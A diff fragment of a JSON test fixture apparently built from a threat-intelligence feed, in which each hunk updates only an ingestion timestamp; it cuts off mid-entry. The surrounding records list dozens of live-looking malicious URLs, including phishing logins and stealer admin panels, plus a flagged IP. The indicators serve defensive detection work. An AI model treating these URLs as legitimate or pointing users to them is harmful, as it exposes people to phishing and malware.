'http://meropa.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:09.474Z\"}", "category": "threat", "type": "indicator", @@ -8890,7 +8890,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023567300Z", + "ingested": "2021-12-14T14:57:43.118236813Z", "original": "{\"created\":\"2020-01-27T02:57:12.314Z\",\"description\":\"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:12.314Z\",\"name\":\"mal_url: http://5umaga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5umaga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.314Z\"}", "category": "threat", "type": "indicator", @@ -8941,7 +8941,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023574900Z", + "ingested": "2021-12-14T14:57:43.118237195Z", "original": "{\"created\":\"2020-01-27T02:57:12.344Z\",\"description\":\"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:12.344Z\",\"name\":\"mal_url: http://dufre1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.344Z\"}", "category": "threat", "type": "indicator", @@ -8992,7 +8992,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023585Z", + "ingested": "2021-12-14T14:57:43.118237737Z", "original": "{\"created\":\"2020-01-27T02:57:17.92Z\",\"description\":\"TS ID: 55259870746; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--53b80678-1eeb-433c-bd54-fd1ae9c83c18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-27T02:57:17.92Z\",\"name\":\"mal_url: http://dufre-tom.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre-tom.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:17.92Z\"}", "category": "threat", "type": "indicator", @@ -9043,7 +9043,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023592900Z", + "ingested": "2021-12-14T14:57:43.118238127Z", "original": "{\"created\":\"2020-01-27T02:57:19.085Z\",\"description\":\"TS ID: 55259870735; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b14f43dd-6653-42d4-b0db-3cf4e7fbee87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:19.085Z\",\"name\":\"mal_url: http://meropi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:19.085Z\"}", "category": "threat", "type": "indicator", @@ -9095,7 +9095,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023596600Z", + "ingested": "2021-12-14T14:57:43.118238514Z", "original": "{\"created\":\"2020-01-28T02:58:19.372Z\",\"description\":\"TS ID: 55263242048; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--e2cdc754-bf45-4c4e-a98a-0fcc1a62cc63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-28T02:58:19.372Z\",\"name\":\"mal_url: http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.372Z\"}", "category": "threat", "type": "indicator", @@ -9147,7 +9147,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023600300Z", + "ingested": "2021-12-14T14:57:43.118238905Z", "original": "{\"created\":\"2020-01-28T02:58:19.396Z\",\"description\":\"TS ID: 55263242003; iType: mal_url; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--f0aa41c1-9c01-420f-9134-20fa6a00f8e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:58:19.396Z\",\"name\":\"mal_url: http://usarmyvacations.info/ssd/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://usarmyvacations.info/ssd/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.396Z\"}", "category": "threat", "type": "indicator", @@ -9198,7 +9198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023605600Z", + "ingested": "2021-12-14T14:57:43.118239450Z", "original": "{\"created\":\"2020-01-28T02:58:26.492Z\",\"description\":\"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--15b60240-37eb-41c9-9e66-872f19406f6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:58:26.492Z\",\"name\":\"mal_url: http://la6e51ed.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.492Z\"}", "category": "threat", "type": "indicator", @@ -9250,7 +9250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023613300Z", + "ingested": "2021-12-14T14:57:43.118239832Z", "original": "{\"created\":\"2020-01-28T02:58:26.52Z\",\"description\":\"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-28T02:58:26.52Z\",\"name\":\"mal_url: http://209.250.247.253/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.250.247.253/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.52Z\"}", "category": "threat", "type": "indicator", @@ -9302,7 +9302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023650400Z", + "ingested": "2021-12-14T14:57:43.118240237Z", "original": "{\"created\":\"2020-01-28T02:58:43.041Z\",\"description\":\"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-28T02:58:43.041Z\",\"name\":\"mal_url: http://footlooking.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.041Z\"}", "category": "threat", "type": "indicator", @@ -9347,7 +9347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023654900Z", + "ingested": "2021-12-14T14:57:43.118240681Z", "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", "category": "threat", "type": "indicator", @@ -9398,7 +9398,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023660600Z", + "ingested": "2021-12-14T14:57:43.118241124Z", "original": "{\"created\":\"2020-01-28T02:58:45.172Z\",\"description\":\"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1a91efe1-ff09-49b2-801b-fb815c843976\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T02:58:45.172Z\",\"name\":\"mal_url: http://a0377875.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0377875.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:45.172Z\"}", "category": "threat", "type": "indicator", @@ -9450,7 +9450,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023664700Z", + "ingested": "2021-12-14T14:57:43.118241508Z", "original": "{\"created\":\"2020-01-28T02:58:46.345Z\",\"description\":\"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:46.345Z\",\"name\":\"mal_url: http://samaaj.org.pk/ofo/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:46.345Z\"}", "category": "threat", "type": "indicator", @@ -9501,7 +9501,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023668800Z", + "ingested": "2021-12-14T14:57:43.118241937Z", "original": "{\"created\":\"2020-01-28T02:58:54.765Z\",\"description\":\"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-28T02:58:54.765Z\",\"name\":\"mal_url: http://f0390226.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390226.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:54.765Z\"}", "category": "threat", "type": "indicator", @@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023673200Z", + "ingested": "2021-12-14T14:57:43.118242396Z", "original": "{\"created\":\"2020-01-28T02:58:57.481Z\",\"description\":\"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:57.481Z\",\"name\":\"mal_url: http://samaaj.org.pk/justices/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:57.481Z\"}", "category": "threat", "type": "indicator", @@ -9605,7 +9605,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023676700Z", + "ingested": "2021-12-14T14:57:43.118242783Z", "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://89.160.20.156/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", "category": "threat", "type": "indicator", @@ -9650,7 +9650,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023682Z", + "ingested": "2021-12-14T14:57:43.118243179Z", "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", "category": "threat", "type": "indicator", @@ -9701,7 +9701,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023688200Z", + "ingested": "2021-12-14T14:57:43.118243631Z", "original": "{\"created\":\"2020-01-28T02:59:26.887Z\",\"description\":\"TS ID: 55263242013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:59:26.887Z\",\"name\":\"mal_url: http://ld7cad07.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:26.887Z\"}", "category": "threat", "type": "indicator", @@ -9746,7 +9746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023694400Z", + "ingested": "2021-12-14T14:57:43.118244076Z", "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", "category": "threat", "type": "indicator", @@ -9798,7 +9798,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023701600Z", + "ingested": "2021-12-14T14:57:43.118244598Z", "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", "category": "threat", "type": "indicator", @@ -9850,7 +9850,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023708800Z", + "ingested": "2021-12-14T14:57:43.118245062Z", "original": "{\"created\":\"2020-01-28T02:59:34.772Z\",\"description\":\"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime\",\"id\":\"indicator--167c21ca-7d6b-455c-954a-91a5f036616d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:34.772Z\",\"name\":\"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.772Z\"}", "category": "threat", "type": "indicator", @@ -9902,7 +9902,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023716Z", + "ingested": "2021-12-14T14:57:43.118245499Z", "original": "{\"created\":\"2020-01-28T02:59:39.12Z\",\"description\":\"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--8a35f477-32b2-4735-9e85-743115f1e83f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:39.12Z\",\"name\":\"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:39.12Z\"}", "category": "threat", "type": "indicator", @@ -9953,7 +9953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023723100Z", + "ingested": "2021-12-14T14:57:43.118245928Z", "original": "{\"created\":\"2020-01-28T02:59:54.142Z\",\"description\":\"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--efcb1909-e772-4001-a96c-97c293baa98d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:54.142Z\",\"name\":\"mal_url: http://l3b57852.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l3b57852.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.142Z\"}", "category": "threat", "type": "indicator", @@ -10005,7 +10005,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023729100Z", + "ingested": "2021-12-14T14:57:43.118246318Z", "original": "{\"created\":\"2020-01-28T02:59:54.166Z\",\"description\":\"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--b5c97605-a434-4b73-a655-acc88db57cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:54.166Z\",\"name\":\"mal_url: http://samaaj.org.pk/fk/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.166Z\"}", "category": "threat", "type": "indicator", @@ -10057,7 +10057,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023735200Z", + "ingested": "2021-12-14T14:57:43.118246749Z", "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", "category": "threat", "type": "indicator", @@ -10102,7 +10102,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023742500Z", + "ingested": "2021-12-14T14:57:43.118247232Z", "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", "category": "threat", "type": "indicator", @@ -10154,7 +10154,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023749500Z", + "ingested": "2021-12-14T14:57:43.118247731Z", "original": "{\"created\":\"2020-01-28T03:00:08.397Z\",\"description\":\"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T03:00:08.397Z\",\"name\":\"mal_url: http://j1034033.myjino.ru/laskovo/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.397Z\"}", "category": "threat", "type": "indicator", @@ -10206,7 +10206,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023756700Z", + "ingested": "2021-12-14T14:57:43.118248233Z", "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", "category": "threat", "type": "indicator", @@ -10258,7 +10258,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023763900Z", + "ingested": "2021-12-14T14:57:43.118248666Z", "original": "{\"created\":\"2020-01-28T03:00:22.832Z\",\"description\":\"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:22.832Z\",\"name\":\"mal_url: http://samaaj.org.pk/ejima/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:22.832Z\"}", "category": "threat", "type": "indicator", @@ -10310,7 +10310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023771200Z", + "ingested": "2021-12-14T14:57:43.118249118Z", "original": "{\"created\":\"2020-01-28T03:00:23.929Z\",\"description\":\"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime\",\"id\":\"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T03:00:23.929Z\",\"name\":\"mal_url: http://155.138.222.174/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.138.222.174/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:23.929Z\"}", "category": "threat", "type": "indicator", @@ -10362,7 +10362,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023775300Z", + "ingested": "2021-12-14T14:57:43.118249510Z", "original": "{\"created\":\"2020-01-28T03:00:30.838Z\",\"description\":\"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:30.838Z\",\"name\":\"mal_url: http://samaaj.org.pk/emp/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:30.838Z\"}", "category": "threat", "type": "indicator", @@ -10413,7 +10413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023780600Z", + "ingested": "2021-12-14T14:57:43.118249996Z", "original": "{\"created\":\"2020-01-28T03:00:52.335Z\",\"description\":\"TS ID: 55263242016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b5e5a709-1001-4905-9019-d69e53b8393d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-28T03:00:52.335Z\",\"name\":\"mal_url: http://minecraft-only.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecraft-only.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:52.335Z\"}", "category": "threat", "type": "indicator", @@ -10465,7 +10465,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023786200Z", + "ingested": "2021-12-14T14:57:43.118250487Z", "original": "{\"created\":\"2020-01-28T03:01:04.475Z\",\"description\":\"TS ID: 55263242040; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--910b12d0-b553-4219-846e-824ea3be86f8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T03:01:04.475Z\",\"name\":\"mal_url: http://buythebest.pw/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://buythebest.pw/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.475Z\"}", "category": "threat", "type": "indicator", @@ -10517,7 +10517,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023790500Z", + "ingested": "2021-12-14T14:57:43.118250930Z", "original": "{\"created\":\"2020-01-28T03:01:04.538Z\",\"description\":\"TS ID: 55263242010; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--6e7ba339-ede0-47fd-a6c9-bd1ffb61fbbf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-28T03:01:04.538Z\",\"name\":\"mal_url: http://smtress.zzz.com.ua/admin/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smtress.zzz.com.ua/admin/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.538Z\"}", "category": "threat", "type": "indicator", @@ -10569,7 +10569,7 @@ } }, "event": { - "ingested": 